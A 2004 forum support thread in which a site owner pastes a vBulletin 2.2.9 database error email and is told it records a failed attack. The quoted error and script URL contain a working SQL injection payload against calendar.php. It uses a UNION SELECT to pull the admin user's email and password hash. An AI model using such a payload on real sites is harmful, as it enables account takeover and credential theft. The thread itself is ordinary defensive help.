vBulletin database error, strange

Collapse
X

• Filter
  • Time
  • Show
Clear All

• vBulletin database error, strange

Out of nowhere I've started receiving at least a few of these everyday on my mailbox indicating there has been a database error, I have no clues of what's causing this:

Database error in vBulletin 2.2.9:

Invalid SQL: SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 14 union select userid,username,email,'0000-0- 0',password,username from user where userid=1
    mysql error: You have an error in your SQL syntax near 'union select userid,username,email,'0000-0- 0',password,username from user where' at line 1

mysql error number: 1064

Date: Thursday 08th of July 2004 08:11:23 AM
    Script: http://www.techspot.com/vb/vb/calendar.php?action=edit&%20eventid=14%20union%20select%20userid,username,email,\'0000-0-%200\',password,username%20from%20user%20where%20userid=1
    Referer:
    Julio Franco
    TechSpot.com

Someone is trying to use a security exploit to compromise your forum. They are failing because you don't have the required mysql version to exploit the issue (which is good for you in this case).

Please see this thread for important information.

Comment

Wow, and I thought it was some sort of misconfiguration, almost got hacked then? Thanks a lot for your support, I look forward moving to vB 3 in the coming weeks/months.
      Julio Franco
      TechSpot.com

Comment

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...
      X